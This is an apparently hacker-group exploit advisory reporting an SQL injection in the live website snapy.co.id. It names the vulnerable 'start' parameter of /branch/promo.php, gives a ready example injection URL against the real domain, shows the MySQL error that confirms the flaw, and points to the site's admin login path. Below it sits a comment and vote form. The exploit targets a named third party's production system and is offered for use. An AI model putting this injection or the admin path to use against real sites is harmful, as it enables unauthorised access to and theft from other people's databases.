SNAPY SQL INJECTION

2019.10.13

5TUP1D-BOY (ID)

Risk: Medium

Local: No

Remote: Yes

CVE: N/A

CWE: CWE-89

#################################
# Exploit Title : SNAPY SQL INJECTION
# Author [ Discovered By ] : 5TUO1D-BOY
# Team : GARUDA SECURITY HACKER
# Dork: N/A
# Date : 13/10/2019
# Vendor : snapy.co.id
# Tested On : Windows 7
# Exploit Risk : Medium
#################################
# Admin Panel Login Path :
**********************
/admin
# SQL Injection Exploit :
**********************
/branch/promo.php?start=[SQL INJECTION]&txt_cari=
##################################
#Example
**********************
http://www.snapy.co.id/branch/promo.php?start=8%27&txt_cari=
##################################
# Example Sql Database Error :
*************************
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '',4' at line 1
##################################
Discovered By 5TUP1D-BOY From Garuda Security Hacker

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

SNAPY SQL INJECTION

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.